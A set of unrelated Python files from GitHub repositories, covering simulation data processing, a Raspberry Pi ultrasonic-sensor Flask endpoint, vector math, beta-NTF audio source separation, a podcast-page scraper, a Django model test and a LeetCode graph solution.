r2_ttc_runs = get_all_runs(r2_ttc_pairs)
r3_ttc_runs = get_all_runs(r3_ttc_pairs)
r4_ttc_runs = get_all_runs(r4_ttc_pairs)
return all_runs, greedy_runs, random_runs, rl_runs, dto_runs, jerk_runs, ttc_runs, greedy_ttc_runs, random_ttc_runs, rl_ttc_runs, r1_ttc_runs, r2_ttc_runs, r3_ttc_runs, r4_ttc_runs
def get_all_runs(scene_attr_path_pairs):
all_runs = []
clean_key = lambda k: k.replace("Attribute[", "").replace("]", "")
for scene_dir, attr_path in tqdm(scene_attr_path_pairs):
runs = [[] for _ in range(20)]
# get scenario attributes
attr_pdf = pd.read_csv(attr_path)
for row_id, row in attr_pdf.iterrows():
run_id = int(row["Execution"])
scene_fname = row["ScenarioID"] + ".deepscenario"
attrs = row.to_dict()
attrs = {clean_key(k): v for k, v in attrs.items()}
runner.load_scenario_file(os.path.join(scene_dir, scene_fname))
for i in range(1, 7):
timeframe = runner.get_scene_by_timestep(timestep=i)
timeframe = json.loads(timeframe)
runs[run_id].append([timeframe, attrs])
all_runs += runs
return all_runs
class Vocab:
def __init__(self):
super(Vocab, self).__init__()
self.id2str = []
self.str2id = {}
def add_if_not_exist(self, s):
if s not in self.str2id:
self.str2id[s] = len(self.id2str)
self.id2str.append(s)
def tokenize(self, s):
return self.str2id[s]
def size(self):
return len(self.id2str)
def build_vocab(str_list):
vocab = Vocab()
for s in str_list:
vocab.add_if_not_exist(s)
return vocab
"""Process elevator data"""
def get_ele_passenger_profiles(fname):
"""
Arrival Time; Arrival Floor; Destination Floor; Mass; Capacity;Loading time; Unloading time;Placeholder
:param fname:
:return:
"""
colnames = ["arrival_time", "arrival_floor", "destination_floor", "mass", "capacity", "loading_time",
"unloading_time", "placeholder"]
pdf = pd.read_csv(fname, header=None, names=colnames, index_col=False)
pdf = pdf[colnames[:-1]] # remove last column
pdf["arrival_time"] = pdf["arrival_time"].astype("float")
pdf["arrival_floor"] = pdf["arrival_floor"].astype("int")
pdf["destination_floor"] = pdf["destination_floor"].astype("int")
return pdf
def get_ele_simulator_result(fname):
"""
Document;Passenger;Source;Destination;ArrivalTime;LiftArrivalTime;DestinationArrivalTime
"""
colnames = ["document", "id", "arrival_floor", "destination_floor", "arrival_time", "lift_arrival_time",
"lift_destination_time"]
pdf = pd.read_csv(fname, names=colnames, delimiter=";", skiprows=1)
pdf = pdf[colnames[2:-1]]
pdf["arrival_time"] = pdf["arrival_time"].astype("float")
pdf["arrival_floor"] = pdf["arrival_floor"].astype("int")
pdf["destination_floor"] = pdf["destination_floor"].astype("int")
return pdf
def get_ele_data(dispatcher, peak_type):
"""
    :param dispatcher: dispatcher index (integer; 0 is the baseline dispatcher)
:param peak_type: ["lunchpeak","uppeak"]
:return: joined data of profiles and results
"""
print(dispatcher, peak_type)
peak_type = "LunchPeak" if "lunch" in peak_type.lower() else "Uppeak"
profile_dir = Config.lunchpeak_profile_dir if peak_type == "LunchPeak" else Config.uppeak_profile_dir
dispatcher_name = "Dispatch_00" if dispatcher == 0 else "Dispatch_M{:2d}".format(dispatcher)
result_dir = os.path.join(Config.result_dir, dispatcher_name)
if not os.path.exists(result_dir):
return False
result_pdfs = []
for i in range(10):
n_variable = "4" if peak_type == "LunchPeak" else "Four"
profile_fname = "{}_mass_capacity_loading_unloading(CIBSE-office-{}){}.txt".format(n_variable, peak_type, i)
result_fname = "{}_mass_capacity_loading_unloading(CIBSE-office-{}){}.csv".format(n_variable, peak_type, i)
profile_pdf = get_ele_passenger_profiles(os.path.join(profile_dir, profile_fname))
result_pdf = get_ele_simulator_result(os.path.join(result_dir, result_fname))
result_pdf = profile_pdf.merge(result_pdf, how="right",
on=["arrival_time", "arrival_floor", "destination_floor"])
result_pdfs.append(result_pdf)
result_pdf = pd.concat(result_pdfs)
result_fname = "Dispatcher_{:2d}_{}.pkl".format(dispatcher, peak_type)
pickle.dump(result_pdf,
open( os.path.join(Config.elevator_save_dir, result_fname),"wb")
)
return result_pdf
if __name__ == '__main__':
"""collect data by runs"""
# runner = lgsvl.scenariotoolset.ScenarioRunner()
# all_runs, greedy_runs, random_runs, rl_runs, dto_runs, jerk_runs, ttc_runs, greedy_ttc_runs, random_ttc_runs, rl_ttc_runs, r1_ttc_runs, r2_ttc_runs, r3_ttc_runs, r4_ttc_runs = get_ds_data(
# runner)
# pickle.dump(all_runs, open(Config.all_runs_pkl_path, "wb"))
# pickle.dump(greedy_runs, open(Config.greedy_runs_pkl_path, "wb"))
# pickle.dump(random_runs, open(Config.random_runs_pkl_path, "wb"))
# pickle.dump(rl_runs, open(Config.rl_runs_pkl_path, "wb"))
# pickle.dump(dto_runs, open(Config.dto_runs_pkl_path, "wb"))
# pickle.dump(jerk_runs, open(Config.jerk_runs_pkl_path, "wb"))
# pickle.dump(rl_runs, open(Config.rl_runs_pkl_path, "wb"))
# pickle.dump(random_ttc_runs, open(Config.random_ttc_runs_pkl_path, "wb"))
# pickle.dump(greedy_ttc_runs, open(Config.greedy_ttc_runs_pkl_path, "wb"))
# pickle.dump(rl_ttc_runs, open(Config.rl_ttc_runs_pkl_path, "wb"))
# pickle.dump(r1_ttc_runs, open(Config.r1_ttc_runs_pkl_path, "wb"))
# pickle.dump(r2_ttc_runs, open(Config.r2_ttc_runs_pkl_path, "wb"))
# pickle.dump(r3_ttc_runs, open(Config.r3_ttc_runs_pkl_path, "wb"))
# pickle.dump(r4_ttc_runs, open(Config.r4_ttc_runs_pkl_path, "wb"))
# process elevator data
    ele_names = ["dispatch_00_lunchpeak", "dispatcher_00_uppeak"]
ele_names += ["dispatcher_{:02d}_lunchpeak_variant".format(i) for i in range(1, 100)]
ele_names += ["dispatcher_{:02d}_uppeak_variant".format(i) for i in range(1, 100)]
peak_types = ["lunchpeak", "uppeak"]
for i in range(100):
for peak_type in peak_types:
pdf = get_ele_data(i, peak_type)
| qhml/ppt | process_data.py | process_data.py | py | 10,320 | python | en | code | 0 | github-code | 36 |
1412530570 | from flask import Flask,render_template,flash,redirect,session,url_for,logging,request,Blueprint,json,session
from flask_json import FlaskJSON, JsonError, json_response, as_json
from smartiot.bin.config.db_config import mysql
from smartiot.routes.route_Permissions.userPermissions import getPermissions
import RPi.GPIO as GPIO # Import Raspberry Pi GPIO library
import time
iot_ultraSonic_bp = Blueprint(
'iot_ultra-sonic_bp',
__name__
)
# define the LED pin
led_pin = 7
@iot_ultraSonic_bp.route("/ultra",methods=['POST'])
def ultraSonic():
try:
content = request.get_json()
action = content['action']
userid = content['userId']
endpoint = content['endPoint']
except:
#response
return json_response(
message="Internal server error",
status = 500
)
permissions = getPermissions(userid,endpoint)
print(str(permissions))
if permissions is "granted":
print('granted')
if action == "measure":
#mysql
#execute query
sql ="INSERT INTO logs(info,value,dataType,deviceName,deviceId,userId) VALUES('',%s,%s,%s,'2',%s)"
#print(str(sql))
#get data from sensor
distance = measure()
d=round(distance ,2)
distance_cm = format(d)
# print( "Distance : {0} cm".distance_cm)
            #create a cursor
cur = mysql.connection.cursor()
result = cur.execute(sql,(distance_cm,"proximity",endpoint,userid))
            #commit to Database
mysql.connection.commit()
return json_response(
distance = distance,
message = "Distance in cm",
status =200
)
if action == "":#other fuctions
#mysql
#execute query
sql ="INSERT INTO logs(info,value,dataType,deviceName,deviceId,userId) VALUES('',%s,%s,%s,'1',%s)"
print(str(sql))
            #create a cursor
cur = mysql.connection.cursor()
result = cur.execute(sql,("on","state",endpoint,userid))
            #commit to Database
mysql.connection.commit()
#close connection
cur.close()
GPIO.cleanup()
return
print('granted')
if permissions is "denied":
#mysql
#execute query
sql ="INSERT INTO logs(info,value,dataType,deviceName,deviceId,userId) VALUES(%s,'','',%s,'1',%s)"
print(str(sql))
        #create a cursor
cur = mysql.connection.cursor()
result = cur.execute(sql,("Permission Denied",endpoint,userid))
        #commit to Database
mysql.connection.commit()
#close connection
cur.close()
#response
return json_response(
distance = "",
message="Permission denied for this user",
status = 403
)
print('denied')
# measure distance
def measure():
GPIO.setmode(GPIO.BCM)
TRIG = 4
ECHO = 18
GPIO.setup(TRIG , GPIO.OUT)
GPIO.setup(ECHO , GPIO.IN)
GPIO.output(TRIG , True)
time.sleep(0.0001)
GPIO.output(TRIG , False)
while GPIO.input(ECHO) == False:
start = time.time();
while GPIO.input(ECHO) == True:
end = time.time();
sig_time = end-start
    # convert echo round-trip time to distance in cm (~58 µs per cm at the speed of sound)
dis = sig_time/0.000058
print('Dist : {} cm'.format(dis))
GPIO.cleanup()
return dis
def measure_average():
# This function takes 3 measurements and
# returns the average.
distance1=measure()
time.sleep(0.1)
distance2=measure()
time.sleep(0.1)
distance3=measure()
distance = distance1 + distance2 + distance3
distance_avg = distance / 3
return distance_avg
| Singh-Kiran-P/smart-iot-python-api | smartiot/routes/iot/ultraSonic.py | ultraSonic.py | py | 3,894 | python | en | code | 0 | github-code | 36 |
15741816314 | from vector_class import Vectors
import math as m
def main():
#ask user for components of the first vector
component_1=input("The first component of the vector is:")
component_2=input("The second component of the vector is:")
component_3=input("The third component of the vector is:")
vector_1=[component_1,component_2,component_3]
print("the first vector is"+str(vector_1))
#ask user for components of the second vector
component2_1=input("The first component of the second vector is:")
component2_2=input("The second component of the second vector is:")
component2_3=input("The third component of the second vector is:")
vector_2=[component2_1,component2_2,component2_3]
print("the second vector is"+str(vector_2))
#ask user for a scalar scalar multiple, c
c=input("my scalar multiple is:")
#initialise the first vector as an instance of the class Vectors
instance_vector=Vectors(vector_1)
#use mag property of vectors to compute the magnitude of the first vector
magnitude=instance_vector.mag
print("the magnitude of the first vector is:"+str(magnitude))
#use mag2 property of vectors to compute the squared magnitude of the first vector
magnitude2=instance_vector.mag2
print("the squared magnitude of the first vector is:"+str(magnitude2))
#use class method to compute dot product of the two vectors
dot_product=instance_vector.dot_prod(vector_2)
print("the dot product of the two vectors is:"+str(dot_product))
#find scalar multiple of first vector
multiple=instance_vector.scalar_multiple(c)
print("the scalar multiple of the first vector is:"+str(multiple))
#use class method "cross" to compute cross product of the two vectors
print("the cross product of the two vectors is:"+str(instance_vector.cross(vector_2)))
#use class method "sum" to add the two vectors
print("the sum of the two vectors is:"+str(instance_vector.sum(vector_2)))
#use class method "diff" the subtract the first vector from the second
print("the second vector minus the first is:"+str(instance_vector.diff(vector_2)))
#check whether the two vectors are the same
print("are the two vectors the same?"+str(instance_vector.same(vector_2)))
main()
| brendan-martin/CompMod-excercise_1 | exercise_1/main2.py | main2.py | py | 2,284 | python | en | code | 0 | github-code | 36 |
74901731943 | import time
import numpy as np
from librosa import load, stft, istft, resample
from librosa.output import write_wav
from sklearn.cluster import MiniBatchKMeans, FeatureAgglomeration
from sklearn import datasets
import warnings
# import matplotlib.pyplot as plt
import mir_eval
import corpus
from scipy.io import loadmat
class beta_NTF(object):
def __init__(self, W, H, X, A, sigma_b, Q, V, K_partition,
epochs=20, debug=False, beta=0):
super(beta_NTF, self).__init__()
# np.seterr(all='warn')
#
# warnings.filterwarnings('error')
self._epochs = epochs
self._debug = debug
self._V = V
self._W = W
self._H = H
self._A = A
self._Q = Q
self._sigma_b = sigma_b
self._Xb = X
self._K_partition = K_partition
self.I, self.F, self.T = X.shape
self.K = W.shape[1]
self.J = Q.shape[0]
self.IJ = self.I*self.J
self.O = np.ones((1,self.T))
self.source_ind = []
for j in range(self.J):
self.source_ind.append(np.arange(0,self.K/self.J)+(j*(self.K/self.J)))
def train(self):
for epoch in range(self._epochs):
# print(epoch)
sigma_ss = np.zeros((self.I,self.J,self.F,self.T))
for i in range(self.I):
sigma_ss[i,:,:,:] = self._V[:,:,:]
sigma_ss = sigma_ss.reshape((self.IJ, self.F, self.T))
sigma_x = np.zeros((self.I,self.I,self.F,self.T), dtype=complex)
inv_sigma_x = np.zeros((self.I,self.I,self.F,self.T), dtype=complex)
Gs = np.zeros((self.I,self.IJ,self.F,self.T), dtype=complex)
s_hat = np.zeros((self.IJ, self.F, self.T), dtype=complex)
bar_Rxs = np.zeros((self.I, self.IJ, self.F, self.T), dtype=complex)
bar_Rss_full = np.zeros((self.IJ, self.IJ, self.F, self.T), dtype=complex)
bar_Rxx = np.zeros((self.I, self.I, self.F, self.T), dtype=complex)
bar_P = np.zeros((self.J, self.F, self.T))
bar_A = np.zeros((self.I, self.F, self.K))
Vc = np.zeros((self.F, self.T, self.K))
W_prev = self._W
H_prev = self._H
A_prev = self._A
sig_b_prev = self._sigma_b
sigma_x[0,0,:,:] = np.matmul(self._sigma_b, self.O)
sigma_x[1,1,:,:] = np.matmul(self._sigma_b, self.O)
for ij in range(self.IJ):
sigma_x[0,0,:,:] = sigma_x[0,0,:,:] + np.multiply(np.matmul(np.power(np.abs(self._A[0,ij,:].reshape((self.F, 1))), 2), self.O), sigma_ss[ij,:,:])
sigma_x[0,1,:,:] = sigma_x[0,1,:,:] + np.multiply(np.matmul(np.multiply(self._A[0,ij,:], np.conj(self._A[1,ij,:])).reshape((self.F, 1)), self.O), sigma_ss[ij,:,:])
sigma_x[1,0,:,:] = np.conj(sigma_x[0,1,:,:])
sigma_x[1,1,:,:] = sigma_x[1,1,:,:] + np.multiply(np.matmul(np.power(np.abs(self._A[1,ij,:].reshape((self.F, 1))), 2), self.O), sigma_ss[ij,:,:])
try:
det_sigma_x = np.multiply(sigma_x[0, 0, :, :], sigma_x[1,1,:,:]) - np.power(np.abs(sigma_x[0,1,:,:]),2)
inv_sigma_x [0,0,:,:] = np.divide(sigma_x[1,1,:,:], det_sigma_x)
inv_sigma_x [0,1,:,:] = np.negative(np.divide(sigma_x[0,1,:,:], det_sigma_x))
inv_sigma_x [1,0,:,:] = np.conj(inv_sigma_x [0,1,:,:])
inv_sigma_x [1,1,:,:] = np.divide(sigma_x[0,0,:,:], det_sigma_x)
except Warning:
scale = np.sum(self._W, axis=0)
print(scale)
# print(self._H)
print(det_sigma_x)
#correct till here
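            # Gs below acts as per-channel gains (a Wiener-style filter) that combine the two mixture channels into the posterior source estimates s_hat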
for ij in range(self.IJ):
Gs[0,ij,:,:] = np.multiply(np.multiply(np.matmul(np.conj(self._A[0,ij,:].reshape((self.F, 1))), self.O), inv_sigma_x [0,0,:,:]) + \
np.multiply(np.matmul(np.conj(self._A[1,ij,:].reshape((self.F, 1))), self.O), inv_sigma_x [1,0,:,:]),
sigma_ss[ij,:,:])
Gs[1,ij,:,:] = np.multiply(np.multiply(np.matmul(np.conj(self._A[0,ij,:].reshape((self.F, 1))), self.O), inv_sigma_x [0,1,:,:]) + \
np.multiply(np.matmul(np.conj(self._A[1,ij,:].reshape((self.F, 1))), self.O), inv_sigma_x [1,1,:,:]),
sigma_ss[ij,:,:])
s_hat[ij,:,:] = np.multiply(Gs[0,ij,:,:], self._Xb[0,:,:]) + np.multiply(Gs[1,ij,:,:], self._Xb[1,:,:])
bar_Rxs[0, ij, :, :] = np.multiply(self._Xb[0,:,:], np.conj(s_hat[ij,:,:]))
bar_Rxs[1, ij, :, :] = np.multiply(self._Xb[1,:,:], np.conj(s_hat[ij,:,:]))
# correct till here
for j1 in range(self.IJ):
for j2 in range(self.IJ):
bar_Rss_full[j1, j2, :, :] = np.multiply(s_hat[j1, :, :], np.conj(s_hat[j2, :, :])) - \
np.multiply(np.multiply(Gs[0, j1, :, :], np.matmul(self._A[0,j2,:].reshape((self.F, 1)), self.O)) + \
np.multiply(Gs[1, j1, :, :], np.matmul(self._A[1,j2,:].reshape((self.F, 1)), self.O)),
sigma_ss[j2,:,:])
bar_Rss_full[j1,j1,:,:] = bar_Rss_full[j1,j1,:,:] + sigma_ss[j1,:,:]
# need to check bar_Rss_full calculation very carefully there is a tiny error
for j in range(self.J):
start_index = (j*self.I)
end_index = (j+1) * self.I
temp_P = np.zeros((self.I, self.F, self.T))
P_i = 0
for i in range(start_index, end_index):
temp_P[P_i, :, :] = np.real(bar_Rss_full[i,i,:,:])
P_i = P_i + 1
bar_P[j, :, :] = np.mean(temp_P, axis=0)
# correct till here
bar_Rxx[0,0,:,:] = np.power(np.abs(self._Xb[0,:,:]),2)
bar_Rxx[0,1,:,:] = np.multiply(self._Xb[0,:,:], np.conj(self._Xb[1,:,:]))
bar_Rxx[1,0,:,:] = np.conj(bar_Rxx[0,1,:,:])
bar_Rxx[1,1,:,:] = np.power(np.abs(self._Xb[1,:,:]),2)
# outers are correct middle has a small error
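            # update the mixing matrix A per frequency bin from the time-averaged cross- and source-covariance estimates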
for f in range(self.F):
self._A[:,:,f] = np.matmul(np.mean(bar_Rxs[:,:,f,:], axis=2),np.linalg.inv(np.mean(bar_Rss_full[:,:,f,:], axis=2)))
for f in range(self.F):
self._sigma_b[f] = 0.5 * np.real(np.trace(np.mean(bar_Rxx[:,:,f,:],axis=2) - \
np.matmul(self._A[:,:,f], np.conj(np.transpose(np.mean(bar_Rxs[:,:,f,:],axis=2)))) - \
np.matmul(np.mean(bar_Rxs[:,:,f,:],axis=2), np.conj(np.transpose(self._A[:,:,f]))) + \
np.matmul(np.matmul(self._A[:,:,f], np.mean(bar_Rss_full[:,:,f,:],axis=2)),
np.conj(np.transpose(self._A[:,:,f])))))
# correct till here
self.calculate_V()
VP_neg = np.multiply(np.power(self._V, -2), bar_P)
V_pos = np.power(self._V, -1)
WoH = np.zeros((self.F, self.T, self.K))
for k in range(self.K):
W_k = self._W[:,k].reshape(-1,1)
H_k = self._H[k,:].reshape(1,-1)
WoH[:,:,k] = np.matmul(W_k, H_k)
Q_num = np.matmul(VP_neg.reshape((self.J, self.F*self.T)), WoH.reshape((self.F*self.T, self.K)))
Q_den = np.matmul(V_pos.reshape((self.J, self.F*self.T)), WoH.reshape((self.F*self.T, self.K)))
self._Q = np.multiply(self._Q, np.divide(Q_num, Q_den))
QoH = self.calculate_V()
VP_neg = np.multiply(np.power(self._V, -2), bar_P)
V_pos = np.power(self._V, -1)
W_num = np.matmul(np.moveaxis(VP_neg, 1, 0).reshape((self.F, self.J*self.T)), QoH.reshape((self.J*self.T, self.K)))
W_den = np.matmul(np.moveaxis(V_pos, 1, 0).reshape((self.F, self.J*self.T)), QoH.reshape((self.J*self.T, self.K)))
self._W = np.multiply(self._W, np.divide(W_num, W_den))
QoW = np.zeros((self.J, self.F, self.K))
for k in range(self.K):
Q_k = self._Q[:,k].reshape((-1, 1))
W_k = self._W[:,k].reshape((1,-1))
QoW[:,:,k] = np.matmul(Q_k, W_k)
self.calculate_V()
VP_neg = np.multiply(np.power(self._V, -2), bar_P)
V_pos = np.power(self._V, -1)
H_num = np.matmul(VP_neg.reshape((self.J*self.F,self.T)).transpose(), QoW.reshape((self.J*self.F, self.K)))
H_den = np.matmul(V_pos.reshape((self.J*self.F,self.T)).transpose(), QoW.reshape((self.J*self.F, self.K)))
self._H = np.multiply(self._H, np.divide(H_num, H_den).transpose())
# small error in V and H
for j in range(self.J):
nonzero_f_ind = np.nonzero(self._A[0, j, :])
self._A[1, j, nonzero_f_ind] = np.divide(self._A[1, j, nonzero_f_ind], self.sign(self._A[0,j,nonzero_f_ind]))
self._A[0, j, nonzero_f_ind] = np.divide(self._A[0, j, nonzero_f_ind], self.sign(self._A[0,j,nonzero_f_ind]))
A_scale = np.power(np.abs(self._A[0,j,:]),2) + np.power(np.abs(self._A[1,j,:]),2)
self._A[:, j,:] = np.divide(self._A[:, j,:], np.tile(np.sqrt(A_scale).reshape(1,-1),(self.I,1)))
self._W[:,self.source_ind[j]] = np.multiply(self._W[:,self.source_ind[j]], np.matmul(A_scale.reshape(-1,1),np.ones((1,len(self.source_ind[j])))))
#
# print(self._A[0,0,0])
# print(self._A[0,1,1])
# print(self._A[1,0,0])
# print(self._A[1,1,1])
scale = np.sum(self._Q, axis=0)
self._Q = np.multiply(self._Q, np.tile(np.power(scale,-1),(self.J,1)))
self._W = np.multiply(self._W, np.tile(scale,(self.F,1)))
scale = np.sum(self._W, axis=0).reshape(1,-1)
self._W = np.multiply(self._W, np.tile(np.power(scale,-1),(self.F,1)))
self._H = np.multiply(self._H, np.tile(scale.transpose(),(1,self.T)))
#
self.calculate_V()
# print(self._V[0,0,0])
# print(self._V[0,1,1])
# print(self._V[1,0,0])
# print(self._V[1,1,1])
criterion = np.sum(np.divide(bar_P, self._V) - np.log(np.divide(bar_P, self._V))) - self.J*self.F*self.T
def sign(self, x):
return np.divide(x,np.abs(x))
def calculate_V(self):
QoH = np.zeros((self.J, self.T, self.K))
for k in range(self.K):
Q_k = self._Q[:,k].reshape((-1, 1))
H_k = self._H[k,:].reshape((1,-1))
QoH[:,:,k] = np.matmul(Q_k, H_k)
self._V = np.zeros((self.J, self.F, self.T))
for j in range(self.J):
self._V[j, :, :] = np.matmul(self._W, QoH[j,:,:].reshape((self.T, self.K)).transpose())
return QoH
def reconstruct(self):
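        # rebuild each source's spatial image by Wiener filtering: weight the mixture by R_j * v_j against the summed model covariance RV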
Y = np.zeros((self.I,self.J,self.F,self.T), dtype=complex)
for t in range(self.T):
for f in range(self.F):
RV = np.zeros((self.I, self.I))
for j in range(self.J):
start_index = (j*self.I)
end_index = (j+1) * self.I
RV = RV + (np.matmul(self._A[:,start_index:end_index,f],np.conj(np.transpose(self._A[:,start_index:end_index,f]))) * self._V[j,f,t])
for j in range(self.J):
start_index = (j*self.I)
end_index = (j+1) * self.I
R = np.matmul(self._A[:,start_index:end_index,f],np.conj(np.transpose(self._A[:,start_index:end_index,f])))
Y[:,j,f,t] = np.matmul(np.matmul((R * self._V[j,f,t]), np.linalg.inv(RV)), self._Xb[:,f,t])
return Y
def getAV(self):
return self._A, self._V
if __name__ == '__main__':
# I = 2
# F = 50
# T = 200
# J = 2
# IJ = I * J
# K_partition = np.asarray([20,20])
# K = np.sum(K_partition)
# X = np.random.randn(I,F,T)
# V = np.random.rand(I,F,T)
# mix_psd = 0.5 * (np.mean(np.power(np.abs(X[0,:,:]),2) + np.power(np.abs(X[1,:,:]),2),axis=1))
# mix_psd = mix_psd.reshape((-1, 1))
# A = 0.5 * np.multiply(1.9 * np.abs(np.random.randn(I,IJ,F)) + 0.1 * np.ones((I,IJ,F)),np.sign(np.random.randn(I,IJ,F) + 1j *np.random.randn(I,IJ,F)))
# W = 0.5 * np.multiply(np.abs(np.random.randn(F,K)) + np.ones((F,K)), np.matmul(mix_psd, np.ones((1,K))))
# H = 0.5 * np.abs(np.random.randn(K,T)) + np.ones((K,T))
# Q = 0.5 * np.abs(np.random.randn(J,K)) + np.ones((J,K))
# sigma_b = mix_psd / 100
#
# QoH = np.zeros((J, T, K))
# for k in range(K):
# Q_k = Q[:,k].reshape((-1, 1))
# H_k = H[k,:].reshape((1,-1))
# QoH[:,:,k] = np.matmul(Q_k, H_k)
#
# V = np.zeros((J, F, T))
# for j in range(J):
# V[j, :, :] = np.matmul(W, QoH[j,:,:].reshape((K, T)))
K_partition = np.asarray([20,20,20])
A = loadmat('mat_files/saveA.mat')['A']
W = loadmat('mat_files/saveW.mat')['W']
H = loadmat('mat_files/saveH.mat')['H']
Q = loadmat('mat_files/saveQ.mat')['Q']
V = loadmat('mat_files/saveV.mat')['V']
X = loadmat('mat_files/saveX.mat')['x']
sigma_b = loadmat('mat_files/saveSig_b.mat')['sig_b']
bn = beta_NTF(W, H, X, A, sigma_b, Q, V, K_partition, epochs=22)
bn.train()
bn.reconstruct()
| TeunKrikke/SourceSeparationNMF | CovNTF/beta_ntf_np.py | beta_ntf_np.py | py | 13,598 | python | en | code | 1 | github-code | 36 |
37634012720 | # Given the edges of a directed graph where edges[i] = [ai, bi] indicates there is an edge between nodes ai and bi, and two nodes source and destination of this graph, determine whether or not all paths starting from source eventually, end at destination, that is:
# At least one path exists from the source node to the destination node
# If a path exists from the source node to a node with no outgoing edges, then that node is equal to destination.
# The number of possible paths from source to destination is a finite number.
# Return true if and only if all roads from source lead to destination.
# Example 1:
# Input: n = 3, edges = [[0,1],[0,2]], source = 0, destination = 2
# Output: false
# Explanation: It is possible to reach and get stuck on both node 1 and node 2.
# Example 2:
# Input: n = 4, edges = [[0,1],[0,3],[1,2],[2,1]], source = 0, destination = 3
# Output: false
# Explanation: We have two possibilities: to end at node 3, or to loop over node 1 and node 2 indefinitely.
# Example 3:
# Input: n = 4, edges = [[0,1],[0,2],[1,3],[2,3]], source = 0, destination = 3
# Output: true
# Example 4:
# Input: n = 3, edges = [[0,1],[1,1],[1,2]], source = 0, destination = 2
# Output: false
# Explanation: All paths from the source node end at the destination node, but there are an infinite number of paths, such as 0-1-2, 0-1-1-2, 0-1-1-1-2, 0-1-1-1-1-2, and so on.
# Example 5:
# Input: n = 2, edges = [[0,1],[1,1]], source = 0, destination = 1
# Output: false
# Explanation: There is infinite self-loop at destination node.
# Constraints:
# 1 <= n <= 10^4
# 0 <= edges.length <= 10^4
# edges[i].length == 2
# 0 <= ai, bi <= n - 1
# 0 <= source <= n - 1
# 0 <= destination <= n - 1
# The given graph may have self-loops and parallel edges.
class Solution:
def leadsToDestination(self, n: int, edges: List[List[int]], source: int, destination: int) -> bool:
graph = {}
for s, e in edges:
graph.setdefault(s, []).append(e)
non_destination = False
found_path = False
is_loop = False
seen = {source}
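        # `seen` tracks the nodes on the current DFS path; revisiting one means a cycle, i.e. infinitely many paths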
def bt(s):
nonlocal is_loop, non_destination, found_path
if is_loop or non_destination:
return
nexts = graph.get(s, [])
if not nexts:
if s != destination:
non_destination = True
else:
found_path = True
return
for n in nexts:
if n in seen:
is_loop = True
return
else:
seen.add(n)
bt(n)
seen.remove(n)
bt(source)
return found_path and not is_loop and not non_destination
| sunnyyeti/Leetcode-solutions | 1059 All Paths from Souce Lead to Destination.py | 1059 All Paths from Souce Lead to Destination.py | py | 2,779 | python | en | code | 0 | github-code | 36 |
7662718828 | import sqlite3
import urllib
from bs4 import BeautifulSoup
from datetime import datetime
conn = sqlite3.connect('pftcrawlerdb.sqlite')
cur = conn.cursor()
# Setup database
cur.executescript('''
DROP TABLE IF EXISTS Podcasts;
DROP TABLE IF EXISTS Appearances;
CREATE TABLE Podcasts (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
name TEXT UNIQUE
);
CREATE TABLE Appearances (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
podcast_id INTEGER,
episode INTEGER,
title STRING,
date DATETIME,
link TEXT UNIQUE)
''')
url = raw_input('Enter - ')
if len(url) == 0 : url = 'http://www.earwolf.com/person/paul-f-tompkins/'
html = urllib.urlopen(url).read()
soup = BeautifulSoup(html, 'lxml')
divTags = soup("div", {"class":"ep-description"})
# comment out when not debugging
# i = int(raw_input('Enter iterations to run: '))
for dtag in divTags:
# comment out when not debugging
# if i == 0: break
# i -= 1
# clear title and link list vars
eptitle = ''
eplink = ''
podcast = ''
epnum = ''
epdatestr = ''
epdate = datetime
# get ep title
eptitle = (dtag.parent.h1.text).replace(':', ' - ')
# get ep link
eplink = dtag.a.get('href', None)
# parse text in span texts to a list & convert to ascii
spanTags = dtag.find_all('span')
tagTexts = []
for tag in spanTags : tagTexts.append((tag.text).encode('ascii', 'ignore'))
# get podcast name
podcast = tagTexts[0].split('#')[0].strip()
# get episode number
epnum = tagTexts[0].split('#')[1].strip()
# get episode date or assign earliest date if date string not parsable
epdatestr = tagTexts[1].strip()
try:
epdate = datetime.strptime(epdatestr, '%B %d, %Y')
except:
epdate = datetime.min
# write values to database
cur.execute('''INSERT OR IGNORE INTO Podcasts (name)
VALUES ( ? )''', ( podcast, ) )
cur.execute('SELECT id FROM Podcasts WHERE name = ? ', (podcast, ))
pod_id = cur.fetchone()[0]
cur.execute('''INSERT OR REPLACE INTO Appearances
(podcast_id, episode, title, date, link) VALUES ( ?, ?, ?, ?, ? )''',
( pod_id, epnum, eptitle, epdate, eplink ) )
conn.commit()
# print alleps
#
#
# if len(titleerror) != 0: print 'There were title errors: ', titleerror
#
# if len(linkerror) != 0: print 'There were link errors: ', linkerror
#
#
# for key, value in alleps.items(): print value[0]
| astewa13/PFTCrawler | ScrapeEarwolf.py | ScrapeEarwolf.py | py | 2,589 | python | en | code | 0 | github-code | 36 |
23111168251 | from mixer.auto import mixer
from rest_framework.test import APITestCase, APIClient
from stock_setup_info.factory import IndustryFactory
from stock_setup_info.models import Industry
# Create your tests here.
class BaseViewTest(APITestCase):
client = APIClient()
@staticmethod
def create_industry(name="", exchange_code="", sync_flag="", logo=""):
if name != "" and exchange_code != "":
Industry.objects.create(
name=name, exchange_code=exchange_code, sync_flag=sync_flag, logo=logo
)
def setUp(self):
self.create_industry("Agriculture", "AG", "0", "0")
self.create_industry("Finance", "AG", "0", "0")
self.industry = IndustryFactory()
class AllModelCreatedTest(BaseViewTest):
def test_model_can_create_list_of_industry(self):
"""
        This test ensures that all the industries added in the setup method exist
"""
new_count = Industry.objects.count()
self.assertNotEqual(0, new_count)
def test_model_via_mixer(self):
obj = mixer.blend("stock_setup_info.models.Industry")
assert obj.pk > 1, "Should create an Industry Instance"
| Maxcutex/stockman_project | stock_setup_info/tests/test_models/test_industry_model.py | test_industry_model.py | py | 1,184 | python | en | code | 2 | github-code | 36 |
38437381382 | def dimensoes(matriz: list) -> str:
return f"{len(matriz)}X{len(matriz[0])}"
def soma_matrizes(m1: list, m2: list) -> list:
if dimensoes(m1) != dimensoes(m2):
return False
result = []
for x in range(len(m1)):
l = []
for i_k, i_v in enumerate(m1[x]):
for j_k, j_v in enumerate(m2[x]):
if i_k == j_k:
l.append(i_v + j_v)
result.append(l)
return result
| carlos-moreno/algorithms | soma_matrizes.py | soma_matrizes.py | py | 452 | python | en | code | 0 | github-code | 36 |
34366380953 | from scripts.hackerrank.isLeapYear import is_leap, is_leap2, is_leap3, is_leap4
class Test:
test_cases = [
[2004, True],
[2008, True],
[2012, True],
[2016, True],
[2005, False],
[2009, False],
[2013, False],
[2017, False],
]
testable_functions = [
is_leap, is_leap2, is_leap3, is_leap4
]
